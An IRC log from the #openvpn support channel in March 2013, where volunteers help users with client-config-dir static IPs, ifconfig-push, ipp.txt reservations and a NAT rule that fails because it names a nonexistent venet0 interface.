19:58 -!- Devastator [~devas@177.18.198.56] has quit [Changing host]
19:58 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn
20:15 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection]
20:19 -!- TriJetScud [~TriJetScu@2001:470:e97f:1003:215:5dff:fe07:4806] has quit [Quit: ZNC - http://znc.in]
20:22 -!- ar0nic [~no@c-174-56-147-242.hsd1.sc.comcast.net] has quit [Ping timeout: 260 seconds]
21:08 -!- sh_t [~sht@176.222.238.158] has quit [Ping timeout: 252 seconds]
21:16 -!- MFSOT [~MFSOT@c-24-34-166-26.hsd1.ma.comcast.net] has quit [Quit: Leaving]
21:16 -!- sh_t [~sht@31.7.62.130] has joined #openvpn
21:20 -!- sh_t [~sht@31.7.62.130] has quit [Ping timeout: 255 seconds]
21:21 -!- sh_t [~sht@lu.privatevpn.com] has joined #openvpn
21:26 -!- sh_t [~sht@lu.privatevpn.com] has quit [Ping timeout: 245 seconds]
21:28 -!- sh_t [~sht@NL2.privatevpn.com] has joined #openvpn
21:46 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 252 seconds]
21:47 -!- MeanderingCode
[~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn
21:48 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 252 seconds]
22:04 -!- [fred] [fred@konfuzi.us] has quit [Ping timeout: 246 seconds]
22:06 -!- CEnnis91 [uid3543@gateway/web/irccloud.com/x-jfwecqjheggpxujq] has quit [Ping timeout: 252 seconds]
22:06 -!- HectorBarbossa [uid7850@gateway/web/irccloud.com/x-oezetszxfobedvxh] has quit [Ping timeout: 256 seconds]
22:07 -!- paccer [uid4847@gateway/web/irccloud.com/x-alqdhrhtspqzjhoz] has quit [Ping timeout: 246 seconds]
22:08 -!- b00gz_ [~uid6869@gateway/web/irccloud.com/x-kkrfkdubixvsunqu] has quit [Ping timeout: 260 seconds]
22:21 -!- p3rror [~mezgani@41.249.23.19] has quit [Ping timeout: 248 seconds]
22:22 -!- aaaar0n [~no@c-174-56-147-242.hsd1.sc.comcast.net] has joined #openvpn
22:22 -!- aaaar0n is now known as ar0nic
22:26 -!- `nand` [~nand@2a01:4f8:d13:5245::2] has quit [Ping timeout: 264 seconds]
22:28 -!- CEnnis91 [uid3543@gateway/web/irccloud.com/x-fulzpfazgvsxtjda] has joined #openvpn
22:33 -!- `nand` [~nand@2a01:4f8:d13:5245::2] has joined #openvpn
22:41 -!- [fred] [fred@konfuzi.us] has joined #openvpn
22:45 -!- [fred] [fred@konfuzi.us] has quit [Ping timeout: 246 seconds]
22:58 -!- [fred] [fred@konfuzi.us] has joined #openvpn
23:18 -!- ar0nic [~no@c-174-56-147-242.hsd1.sc.comcast.net] has quit [Ping timeout: 255 seconds]
23:38 -!- latenite [~latenite@138.77.122.195] has joined #openvpn
23:43 < latenite> Hi folks, For the "client-config-dir ccd" setup I need the client common name. Getting this: Subject: C=US, ST=CA, L=Berlin, O=private, CN=client_x301/emailAddress=kai@poeritz.de
23:43 < latenite> Would the common name be: client_x301
23:44 < latenite> or
23:44 < latenite> client_x301/emailAddress=kai@poeritz.de
23:44 < pekster> client_x301
23:44 < pekster> The extra part is just the emailAddress attribute
23:44 < latenite> pekster, thank you.
23:45 < latenite> pekster, I just talked to my ISP.
And I will try not to use DNAT but rather buy 2 more IPs
23:45 < latenite> What do you think of that? That's technically better. Right?!
23:46 < pekster> Anything that avoids NAT is good, although you still need to be careful about on-link vs routed
23:46 < pekster> It's a lot easier to use tap if upstream expects it to be on-link, or you can use solutions like arp proxying
23:47 < latenite> pekster, latenite <- laughs :D
23:47 < pekster> Or a 1:1 NAT to rfc1918 I suppose, but then you're back to some NAT again (albeit more manageable)
23:47 < latenite> pekster, you throw all these cool new words at me. I get dizzy :D
23:47 < latenite> on-link vs routed ?
23:48 < pekster> How are you getting the IPs? Will your network provider be routing them to the IP of your existing host, or do you get additional IPs on the subnet (aka on-link)
23:49 < latenite> pekster, that I don't know yet. It's kind of hard to get IPs from them. One has to fill out a form and politely ask for them...even tell them why one wants them and what for
23:49 < latenite> I will know in a couple hours which and if I get the IPs
23:50 < latenite> for now I try to setup the vpn server so it pushes static IP to the clients
23:52 < latenite> pekster, so "on-link" means IN the same subnet?! and routed means you get to add a default route to the machine that has the new IP to reach the host?
23:55 < pekster> If I understand you correctly, yes
23:58 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn
23:58 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host]
23:58 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
23:58 -!- mode/#openvpn [+o krzee] by ChanServ
--- Day changed Tue Mar 05 2013
00:01 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has quit [Ping timeout: 272 seconds]
00:03 -!- b00gz_ [uid6869@gateway/web/irccloud.com/x-kigwgkzeuuhujksq] has joined #openvpn
00:04 -!- HectorBarbossa [uid7850@gateway/web/irccloud.com/x-lamyntzwqdjvorgy] has joined #openvpn
00:05 < latenite> pekster, nice. ok.
00:05 < latenite> pekster, can you show me an example of ./ccp/clientfile ?
00:05 < latenite> What can/has to be in there besides:
00:05 < latenite> ifconfig-push ${clientip}
00:05 <@krzee> !ccd
00:05 <@vpnHelper> "ccd" is (#1) entries that are basically included into server.conf, but only for the specified client based on common-name. use --client-config-dir to enable it, then put the config options for the client in /common-name or (#2) the ccd file is parsed each time the client connects.
00:06 < latenite> krzee, (nice nick by the way) :D
00:07 < latenite> which would be the "put the config options for the client in" ?
00:07 <@krzee> what are you trying to do?
00:07 < latenite> what else is essential besides the IP
00:07 <@krzee> thats for you to answer, not me
00:07 <@krzee> i cant decide your goals
00:08 < latenite> krzee, I want my client to have one of the IP in my pool. So it can be publicly accessible through the VPN
00:08 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has joined #openvpn
00:09 <@krzee> i see
00:09 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer]
00:09 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn
00:09 <@krzee> do you have a range of IPs that was routed to you?
00:09 < latenite> krzee, would I only need to push the IP. Or also the gateway, netmask ...
00:10 < latenite> krzee, "range"..kind of. I have two extra IPs
00:10 <@krzee> when you say "in my pool" you mean the pool used in --server?
00:11 < latenite> krzee, no I mean pool as in "what my ISP provides me with"
00:11 <@krzee> hmm if pekster was suggesting something go with whatever he's saying
00:11 < latenite> krzee, I figured I had to tell the server somehow that there are IPs it can select from. I did not know how though
00:12 < pekster> Well, we never figured out how the IPs are available, so any suggestions I had were as-yet theoretical
00:12 <@krzee> personally i'd prolly end up doing bi-directional NAT in your case, he prolly has a cleaner way if he was talking about pushing an ip in ccd
00:12 <@krzee> ohh ok, so you were thinking what i was orig thinking
00:12 <@krzee> him saying "i just have some extra IPS" made me think thats not going to be doable
00:12 <@krzee> ... didnt sound like he has blocks routed to him
00:13 < pekster> I'm guessing it'll just be on-link, so either a tap bridge, arp-proxy, or server holds all 3 IPs and 1:1 NAT
00:13 -!- paccer [uid4847@gateway/web/irccloud.com/x-ulcvmydcnprnqyfl] has joined #openvpn
00:13 < pekster> If they're routed, then PtP if the clients support that, or trickery if the clients are Windows
00:14 < pekster> pick(cat->skin);
00:15 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Read error: Connection reset by peer]
00:16 -!- Dr_Wendy [~FuckOff@208.102.159.64] has joined #openvpn
00:18 < Dr_Wendy> Is this the appropriate place to ask for a bit of help?
00:19 -!- latenite [~latenite@138.77.122.195] has quit [Ping timeout: 245 seconds]
00:19 < Dr_Wendy> It seems like my issue is indeed with my iptables... but i cannot see what i am missing
00:20 < Dr_Wendy> i had openvpn setup just fine on this server...
then i switched my distro to wheezy instead of squeeze 00:20 -!- latenite [~latenite@138.77.122.195] has joined #openvpn 00:20 < Dr_Wendy> now the connection is fine... but no data is getting through 00:21 < latenite> pekster, krzee sorry 00:21 < latenite> my wifi is just DEAD slow..I can hardly type here 00:22 <@krzee> Dr_Wendy, you can post them and see if anyone catches it, but i note that there is also #iptables and #debian 00:22 <@krzee> well #iptables is ##netfilter but same thing :D 00:22 < Dr_Wendy> i tried debian once before... it was dead silent in there 00:22 < Dr_Wendy> waited for hours with no help 00:22 < Dr_Wendy> >_> 00:22 < Dr_Wendy> maybe a fluke? 00:23 < latenite> my wifi is just DEAD slow..I can hardly type here 00:23 < pekster> #netfilter, single hash 00:23 <@krzee> heh, yet managed to type that 2x 00:23 < Dr_Wendy> krzee: the really frustrating part is that i have this exact setup working perfectly fine with an OpenVZ based vps 00:23 <@krzee> oh ya? i thought it was unofficial, thats cool! 00:23 < latenite> pekster, so why is there always two IP in ifconfig-push? Like 172.31.111.150 172.31.111.145 00:23 < latenite> ifconfig-push 172.31.111.150 172.31.111.145 00:23 < Dr_Wendy> yet on my dedicated server... it fooked up 00:24 < pekster> latenite: manpage expalins it. It's local vs remote of a PtP peerint 00:24 < pekster> peering* 00:24 < pekster> or local/subnet in tap or subnet topology 00:25 < Dr_Wendy> krzee: for the dedicated server... i don't really have any rules set 00:26 < Dr_Wendy> this is what i did... 
00:26 < Dr_Wendy> echo 1 > /proc/sys/net/ipv4/ip_forward
00:26 < Dr_Wendy> iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o venet0 -j MASQUERADE
00:26 < Dr_Wendy> iptables-save > /etc/iptables.conf
00:26 < Dr_Wendy> echo '#!/bin/sh' > /etc/network/if-up.d/iptables
00:26 < Dr_Wendy> echo "iptables-restore < /etc/iptables.conf" >> /etc/network/if-up.d/iptables
00:26 < Dr_Wendy> chmod +x /etc/network/if-up.d/iptables
00:26 < Dr_Wendy> echo "net.ipv4.ip_forward=1" >> /etc/sysctl.conf
00:27 < Dr_Wendy> but... ive also killed the MASQUERADE rule... and replaced it with...
00:27 < Dr_Wendy> iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o venet0 -j SNAT --to MY.IP.HERE
00:28 < Dr_Wendy> still no data getting through
00:28 < Dr_Wendy> sorry for the spam >_<
00:28 < latenite> pekster, ok found it. How do I figure out the remote-netmask on the server?
00:29 < pekster> Dr_Wendy: Pinging your VPN peer works now?
00:30 < pekster> latenite: No clue, that depends on your setup. netmask is only used in tun+subnet, or tap modes. You use the IP to peer with in p2p or net30 topologies with tun
00:30 < Dr_Wendy> i can properly connect from home just fine
00:30 < latenite> pekster, that's the server: https://gist.github.com/anonymous/5088437 so would it be: 255.255.255.248
00:30 <@vpnHelper> Title: gist:5088437 (at gist.github.com)
00:30 < pekster> Not what I asked. Can you ping the VPN peer via its VPN IP?
00:31 < pekster> latenite: You can't do what you propose with tun. You can't "magically" assign routed connections to a remote subnet like that
00:31 <@krzee> im watching/loving TPB AFK
00:32 < pekster> I took pride that my copyleft OS accessed, downloaded, and is still seeding that, and it's all 100% legit as it's CC-by-sa
00:33 <@krzee> dude just explained to the judge that the DMCA stuff was spam
00:33 <@krzee> lol
00:33 <@krzee> "spam is email i did not request"
00:35 < Dr_Wendy> pekster: https://pastee.org/tqg3s
00:36 < pekster> Dr_Wendy: That's expected (10.8.0.5 is just a virtual peering IP - you reach your server on .1) pastebin 'iptables-save -c'
00:37 < pekster> And then your server openvpn config
--- Log closed Tue Mar 05 00:38:49 2013
--- Log opened Tue Mar 05 00:39:43 2013
00:39 -!- ecrist_ [~ecrist@2607:fc50:1001:5200::2] has joined #openvpn
00:39 -!- Irssi: #openvpn: Total of 175 nicks [8 ops, 0 halfops, 5 voices, 162 normal]
00:40 -!- Irssi: Join to #openvpn was synced in 41 secs
00:40 < Dr_Wendy> https://pastee.org/2497w
00:41 < pekster> And venet0 is your upstream interface?
00:41 -!- ecrist [~ecrist@freebsd/contributor/openvpn.community.support.ecrist] has quit [Ping timeout: 250 seconds]
00:41 -!- _quadDamage [~EmperorTo@boom.blissfulidiot.com] has quit [Ping timeout: 246 seconds]
--- Log closed Tue Mar 05 00:47:27 2013
--- Log opened Tue Mar 05 00:53:31 2013
00:53 -!- ecrist [~ecrist@token-black.secure-computing.net] has joined #openvpn
00:53 -!- Irssi: #openvpn: Total of 174 nicks [6 ops, 0 halfops, 4 voices, 164 normal]
00:53 -!- mode/#openvpn [+o ecrist] by ChanServ
00:53 < Dr_Wendy> Password is Hello
00:54 -!- Irssi: Join to #openvpn was synced in 40 secs
00:54 < pekster> s/H/h/
00:54 < Dr_Wendy> ?
00:55 < pekster> You need to add the 'route-gateway 10.8.0.1' directive to the client, or push it from the server
00:55 < pekster> that's not included by default in net30 topology, and you cannot use redirect-gateway without that value IIRC. Client logs probably have an error to this effect
00:56 < Dr_Wendy> no errors in the client logs
00:56 < Dr_Wendy> what i don't understand is that i am not doing anything different from my normal setup
00:57 < Dr_Wendy> however
00:57 < Dr_Wendy> there is one thing that i have neglected to mention... but i don't think it should affect my problem
00:58 < Dr_Wendy> I switched to wheezy and i was using squeeze.... but i used the ovpn squeeze repo to install ovpn
00:58 < pekster> What's the routing table on the client look like after connection?
00:58 < pekster> !interface
00:58 < pekster> Ugh, bot is missing
00:59 < pekster> simply, 'route print -4' when the VPN is up
00:59 -!- Webhostbudd_ [~Webhostbu@c-24-7-197-240.hsd1.il.comcast.net] has joined #openvpn
00:59 < Dr_Wendy> i would have compiled 2.3.0 from source... but last time i did that... everything installed to non standard directories
01:00 -!- dropje [~yge@ip4da6274e.direct-adsl.nl] has quit [Ping timeout: 255 seconds]
01:00 -!- dropje [~yge@ip4da6274e.direct-adsl.nl] has joined #openvpn
01:00 < Dr_Wendy> route print -4 server side?
01:00 < pekster> /usr/local is quite standard when building from source; touching /usr on a modern Linux distro is going to cause you headache, so don't do it
01:00 < pekster> client side
01:00 < Dr_Wendy> client side will be windows for now
01:01 < pekster> Right, this is why the route command is windows syntax
01:02 < Dr_Wendy> give me a moment to paste this
01:03 -!- Webhostbudd [~Webhostbu@c-24-7-197-240.hsd1.il.comcast.net] has quit [Ping timeout: 255 seconds]
01:09 < Dr_Wendy> any insight pekster?
01:11 < pekster> How far does a traceroute to 4.2.2.1 get?
01:11 < pekster> Or, since this is windows, '
01:11 < pekster> 'tracert 4.2.2.1'
01:12 < Dr_Wendy> i know how to traceroute in windows lol
01:12 < Dr_Wendy> but yeah, i can connect and try again... but i am certain it just times out
01:12 < Dr_Wendy> everything times out
01:13 < Dr_Wendy> this is what i get when i try to connect to anything after i connect to the server through ovpn
01:14 < pekster> A traceroute should not time out with that setup; you should at the very least get to your server
01:14 < pekster> If you do not, you have much more serious issues
01:14 < pekster> And no, "everything" doesn't time out as you can ping the server itself
01:15 < Dr_Wendy> https://pastee.org/79cyr
01:16 < Dr_Wendy> anything other than the server is unreachable
01:19 < Dr_Wendy> Pinging 8.8.8.8 with 32 bytes of data:
01:19 < Dr_Wendy> Request timed out.
01:19 < Dr_Wendy> Request timed out.
01:19 < Dr_Wendy> Request timed out.
01:19 < Dr_Wendy> Request timed out.
01:19 < Dr_Wendy> Ping statistics for 8.8.8.8:
01:19 < Dr_Wendy> Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
01:20 < pekster> Right, so, a trace...
01:20 < Dr_Wendy> is taking a long time
01:20 < Dr_Wendy> lol
01:21 < pekster> After maybe 6 hops it won't matter anyway. If you don't get to the server as your next-hop, there's a problem
01:21 -!- smerz [~smerz@a177088.upc-a.chello.nl] has quit [Ping timeout: 248 seconds]
01:22 < Dr_Wendy> Tracing route to 8.8.8.8 over a maximum of 30 hops
01:22 < Dr_Wendy> 1 111 ms 111 ms 112 ms 10.8.0.1
01:22 < Dr_Wendy> 2 * * * Request timed out.
01:22 < Dr_Wendy> 3 * * * Request timed out.
01:22 < Dr_Wendy> 4 * * * Request timed out.
01:22 < Dr_Wendy> 5 * * * Request timed out.
01:22 < Dr_Wendy> 6 * * * Request timed out.
01:22 < Dr_Wendy> 7 ^C
01:22 < pekster> Check your iptables-save -c output on the server again: is the MASQUERADE rule being hit?
01:23 < pekster> it should have a hitcount with values higher than [0:0]
01:23 < pekster> Next up would be to check 'sysctl net.ipv4.ip_forward'
01:23 < Dr_Wendy> [0:0] -A POSTROUTING -s 10.8.0.0/24 -o venet0 -j MASQUERADE
01:23 < Dr_Wendy> [0:0] -A POSTROUTING -s 10.8.0.0/24 -o venet0 -j SNAT --to-source SERVER.IP.HERE
01:24 < pekster> Should be '1' for forwarding to be enable
01:24 < pekster> +d
01:24 < Dr_Wendy> it is
01:24 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn
01:24 -!- mode/#openvpn [+o vpnHelper] by ChanServ
01:24 < pekster> 'ip -r' on the server show the default route out via venet0 (spelling/case counts here)
01:26 < Dr_Wendy> that command does not work
01:26 < Dr_Wendy> could you be more specific?
01:26 < Dr_Wendy> sorry for any trouble
01:26 < rob0> "ip r"
01:26 < pekster> The default route needs to be out via venet0 for the NAT rule to work
01:26 < rob0> no -
01:27 < pekster> rob0: Good catch; I'm up later than I should be. I *think* I put that right in the bot (but best check that too...)
01:27 < pekster> !interface
01:27 <@vpnHelper> "interface" is (#1) paste interface configuration from both client and server, while being disconnected and when being connected. Be sure to also add the routing tables for both situations from client and from server or (#2) For Windows: iface: 'ipconfig /all' routing: 'route print' (add -4 or -6 for just IPv4 or v6) or (#3) For Unix: iface: 'ifconfig -a' routing: 'netstat -rn' or (#4) For Linux:
01:27 <@vpnHelper> iface: 'ip a' routing: 'ip r' (use ip -6 for IPv6 routes)
01:28 < Dr_Wendy> would you like me to paste my /etc/network/interfaces file?
01:28 < pekster> Just look at 'ip r' for the default route and verify it's venet0
01:28 < pekster> Either it's the wrong interface, or the packets aren't getting routed where you think they are
01:29 < Dr_Wendy> there is 0 mention of venet0 in my interfaces file
01:29 < Dr_Wendy> but that has never been an issue before
01:29 < pekster> You're performing NAT based on that as an output interface...
01:29 < Dr_Wendy> forgive my ignorance... but you lost me there
01:29 < rob0> the SNAT rule would never be hit anyway, since the same matching criteria are used on the previous rule
01:29 < pekster> If you don't actually have that interface, you're not NATing the packets (which is why your hitcounts on the rules have matched 0 packets) and they are thus unroutable as you send them upstream
01:30 < pekster> Dr_Wendy: Your netfilter setup, line 14 here: https://pastee.org/ytd5b
01:30 < pekster> If you do not have a "venet0" interface, then you apparently blindly copied some example rule from somewhere without understanding that it must match your interface, not the blog you pulled it from
01:30 < pekster> -o is "output interface" as described in iptables(8)
01:31 < Dr_Wendy> only interface i have in use is eth0
01:31 < pekster> Then fix your NAT rule
01:31 < pekster> That's why this doesn't work
01:31 < Dr_Wendy> .__.
01:32 < Dr_Wendy> i wonder if this is an issue with ovh's images
01:32 < Dr_Wendy> when i was using squeeze... that exact rule was fine
01:32 < Dr_Wendy> i'll admit to being a novice with iptables, among other things... but it was working before
01:33 < pekster> Then it would stand to reason either your interface name or netfilter rules changed
01:33 < rob0> You can't use random interface names. Use real names.
01:34 < pekster> Well, you can use a random name if it matches a real one :P. ip link set dev eth0 rob0570463 ;)
01:34 < pekster> s/eth0/name/
01:34 < pekster> Ugh
01:34 < pekster> Nevermind, I'm going to bed instead. You know what I meant :P
01:35 < Dr_Wendy> so i should change the rule to iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE and it should work?
01:35 < Dr_Wendy> also... do you guys prefer MASQUERADE?
01:36 < Dr_Wendy> or do you use rules more like my other rule
01:36 < pekster> MASQUERADE is fine. Technically it incurs a slight performance hit, but not one that's going to impact your usage
01:36 < Dr_Wendy> btw... the reason i usually stick with venet0 is because most of my boxes are vps
01:36 < pekster> You can't "stick with" an interface that doesn't exist
01:37 < Dr_Wendy> lesson learned
01:37 < rob0> Nevertheless, you must use real interface names.
01:37 < Dr_Wendy> you have my sincere thanks
01:37 < Dr_Wendy> all of you
01:40 < Dr_Wendy> so iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j SNAT --to IP.HERE will not incur the same performance hit that MASQUERADE does?
01:40 < Dr_Wendy> just want to be sure before i commit
01:40 < Dr_Wendy> i'd like things to be as efficient as possible
01:41 < pekster> They do the same thing, with the exception that SNAT needs to be updated when your IP changes, while MASQUERADE queries the IP on the interface for every packet. This is a fast query, but it happens for every packet
01:41 < Dr_Wendy> i see
01:42 < Dr_Wendy> thank you pekster
01:43 < Dr_Wendy> working perfectly
01:43 < Dr_Wendy> lesson learned
01:44 < Dr_Wendy> now let's see if i can fix my xen box
01:44 < Dr_Wendy> haha
01:52 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn
01:55 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Client Quit]
01:59 -!- vaillor [~lol2@2-226-37-187.ip179.fastwebnet.it] has quit [Ping timeout: 252 seconds]
02:10 -!- genghi [~Adium@2.171.156.135] has joined #openvpn
02:12 < genghi> hi all… openvpn is resetting my ipp.txt to zero length after I manually add reservations. What should I do to prevent that?
02:12 < genghi> I am not using duplicate-cn, fwiw
02:18 -!- goldkatze [~nobody@unaffiliated/goldkatze] has joined #openvpn
02:19 -!- aaaar0n [~no@c-174-56-147-242.hsd1.sc.comcast.net] has joined #openvpn
02:19 -!- aaaar0n is now known as ar0nic
02:22 <@krzee> !ipp
02:22 <@vpnHelper> "ipp" is (#1) the option --ifconfig-pool-persist ipp.txt does NOT create static ips or (#2) Note that the entries in this file are treated by OpenVPN as suggestions only, based on past associations between a common name and IP address. They do not guarantee that the given common name will always receive the given IP address. If you want guaranteed assignment, see !iporder and !static
02:22 <@krzee> genghi, ^ =]
02:23 < genghi> thanks
02:23 < genghi> !static
02:23 <@vpnHelper> "static" is (#1) use --ifconfig-push in a ccd entry for a static ip for the vpn client or (#2) example in net30 (default): ifconfig-push 10.8.0.6 10.8.0.5 example in subnet (see !topology) or tap (see !tunortap): ifconfig-push 10.8.0.5 255.255.255.0 or (#3) also see !ccd and !iporder
02:24 <@krzee> np
02:24 < genghi> in this case, I have a few addresses that should never be used, if I create a "dummy" ccd with those addresses, will that ensure the reserved addresses will not be allocated?
02:25 < genghi> !iporder
02:25 <@vpnHelper> "iporder" is (#1) OpenVPN's internal client IP address selection algorithm works as follows: 1 -- Use --client-connect script generated file for static IP (first choice). or (#2) Use --client-config-dir file for static IP (next choice) !static for more info or (#3) Use --ifconfig-pool allocation for dynamic IP (last choice) or (#4) if you use --ifconfig-pool-persist see !ipp
02:27 <@krzee> or you could use addresses outside the pool
02:27 <@krzee> like in the howto here:
02:27 <@krzee> !policy
02:27 <@vpnHelper> "policy" is (#1) http://openvpn.net/howto.html#policy for Configuring client-specific rules and access policies or (#2) http://www.secure-computing.net/wiki/index.php/OpenVPN/FAQ#Traffic_forwarding_doesn.27t_work_when_using_client_specific_access_rules for a lil writeup by mario
02:28 -!- Dr_Wendy [~FuckOff@208.102.159.64] has quit [Quit: Senkei.Senbonzakura.Kageyoshi]
02:29 <@krzee> let the pool be for normal users
02:29 <@krzee> ones that need static, give them a different subnet
02:30 <@krzee> then you wont have to worry about it giving out your static ips
02:36 < genghi> it's not a question of handing out dup IPs, there is one address reserved for routing issues that I just don't want allocated even though it is in the beginning of the network range for openvpn clients
02:45 <+EugeneKay> krzee, are you about
02:45 <@krzee> about to smoke one? yep!
02:45 <+EugeneKay> Hehe
02:45 <@krzee> genghi, huh?
02:45 <+EugeneKay> I'm trying to solve a problem with a HA network, maybe you can be of some help
02:46 <+EugeneKay> I have a pair of servers, call them A and B. Both run openvpn, and keepalived.
02:46 <+EugeneKay> Behind them is a coupla LANs, which openvpn clients need to access
02:48 <+EugeneKay> The issue is that if clients are connected to one box, and that box is not the keepalived master, they won't be able to reach any of the server LANs
02:48 <+EugeneKay> What I'm doing as a workaround is nathack
02:49 <+EugeneKay> Thoughts?
02:50 < genghi> given this server config: 10.1.1.128 255.255.255.128 openvpn is handing out 10.1.1.130 as an IP to the first client, though that is the p-t-p addr on the server
02:50 <+EugeneKay> genghi - just use --topology subnet. Really.
02:50 < genghi> so the first client that connects gets an unusable address
02:50 <+EugeneKay> It'll make your life a lot simpler
02:50 < genghi> I am using that
02:50 < genghi> topology subnet
02:51 <+EugeneKay> krzee - oh nevermind.... apparently keepalived has a way to run scripts on takeover/giveback. I'll just abuse that.
02:53 <@krzee> A and B are on the same lans?
02:53 <+EugeneKay> Yeah
02:53 <+EugeneKay> They're redundant routers
02:54 <@krzee> ahh nice
02:54 <@krzee> so linux's carp
02:55 <+EugeneKay> I'll just have the up/down script add/remove a SNAT rule
02:55 <+EugeneKay> I /could/ have it route the traffic to the other node, but that's more failure-prone IMO
02:56 <@krzee> genghi, why split a 1918 block for openvpn? just give it a whole /24 lol
02:56 <+EugeneKay> And at that point I might as well run a full routing daemon, which I'm trying not to do
03:09 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn
03:21 -!- zz_AsadH is now known as AsadH
03:44 -!- marksaitis [~marksaiti@81.101.81.114] has joined #openvpn
03:48 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn
03:59 -!- tjz [~tjz@unaffiliated/tjz] has quit [Ping timeout: 252 seconds]
03:59 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn
03:59 < Wulf> Hi
03:59 < Wulf> I need to execute a command as root when a client connects. How can I do that?
04:00 <@krzee> !script
04:00 <@vpnHelper> "script" is see http://openvpn.net/index.php/open-source/documentation/manuals/69-openvpn-21.html#lbAR for a list of places scripts can hook into openvpn
04:00 <@krzee> you'll want client-connect
04:00 <@krzee> and no dropping permissions with --user / --group
04:01 < Wulf> oh, thanks. I was looking at "client-config-dir"
04:02 <@krzee> np
04:10 -!- nonotza [~nonotza@cpe-74-73-224-62.nyc.res.rr.com] has quit [Quit: nonotza]
--- Log closed Tue Mar 05 04:21:28 2013
--- Log opened Tue Mar 05 04:33:14 2013
04:33 -!- ecrist [~ecrist@token-black.secure-computing.net] has joined #openvpn
04:33 -!- Irssi: #openvpn: Total of 177 nicks [7 ops, 0 halfops, 4 voices, 166 normal]
04:33 -!- mode/#openvpn [+o ecrist] by ChanServ
04:33 -!- Irssi: Join to #openvpn was synced in 42 secs
04:35 -!- b00gz_ [uid6869@gateway/web/irccloud.com/x-kigwgkzeuuhujksq] has quit [Ping timeout: 255 seconds]
04:36 -!- b00gz_ [uid6869@gateway/web/irccloud.com/x-obkuahzvfsrfbrdf] has joined #openvpn
--- Log closed Tue Mar 05 04:38:23 2013
--- Log opened Tue Mar 05 04:55:56 2013
04:55 -!- ecrist [~ecrist@token-black.secure-computing.net] has joined #openvpn
04:55 -!- Irssi: #openvpn: Total of 175 nicks [6 ops, 0 halfops, 4 voices, 165 normal]
04:55 -!- mode/#openvpn [+o ecrist] by ChanServ
04:56 -!- Irssi: Join to #openvpn was synced in 40 secs
04:56 -!- _quadDamage [~EmperorTo@boom.blissfulidiot.com] has joined #openvpn
05:28 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn
05:28 -!- mode/#openvpn [+o vpnHelper] by ChanServ
05:33 -!- ar0nic [~no@c-174-56-147-242.hsd1.sc.comcast.net] has quit [Ping timeout: 276 seconds]
05:41 -!- tjz [~tjz@unaffiliated/tjz] has joined #openvpn
05:45 -!- vaillor [~lol2@2-226-37-187.ip179.fastwebnet.it] has joined #openvpn
05:45 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn
05:45 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer]
06:06 -!- TommehM [~TomM@unaffiliated/tommehm] has quit [Excess Flood]
06:07 -!- latenite [~latenite@138.77.122.195] has quit [Ping timeout: 276 seconds]
06:13 -!- sw0rdfish- [~bingo@156.52.198.220] has joined #openvpn
06:13 -!- sw0rdfish- [~bingo@156.52.198.220] has quit [Remote host closed the connection]
06:17 -!- TommehM [~TomM@unaffiliated/tommehm] has joined #openvpn
06:17 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
06:39 < vaillor> which one between privatetunnel.msi and openvpn-install-2.3.0-I004-i686.exe is better?
06:39 -!- micw [~micw@178-24-236-6-dynip.superkabel.de] has joined #openvpn
06:39 < micw> hi
06:40 < micw> i have 2 servers, both with multiple external ips. now I'd like to make one of the ips appear to be on the other server. is this possible with openvpn?
06:40 < micw> I'll explain a bit more:
06:41 < micw> i have ServerA with IP A1 and IP A2 and ServerB with IP B1.
06:41 < micw> now i want to move applications running on IP A2 to ServerB. But the IP is bound to the location of ServerA
06:42 < micw> I'd setup an openvpn connection between both, using a private subnet for the vpn
06:43 < micw> on ServerA i set a route to IP A2 over the vpn
06:43 < micw> on ServerB i simply set up the IP A1. now traffic to IP A2 would go through ServerA to ServerB. But what happens with all answer traffic?
06:45 -!- nonotza [~nonotza@cpe-74-73-224-62.nyc.res.rr.com] has joined #openvpn
06:45 < micw> or should i use bridging here?
06:45 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 255 seconds]
06:46 < genghi> do you want the IP live in two locations at once? Or move it over when needed?
06:46 < micw> i want to move it over
06:46 < micw> on ServerA runs a virtual machine (i call it A2) which owns IP A2
06:46 < genghi> sounds to me more like you want heartbeat
06:47 < micw> i want to move it to ServerB and assign there 2 IPs to it (A2 and B2)
06:47 < micw> after this, i migrate all services to IP B2
06:47 < micw> it's just a temporary solution
06:48 < micw> since these are virtual machines (and their virtual network card is part of a bridge) bridging might be a better solution here
06:49 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
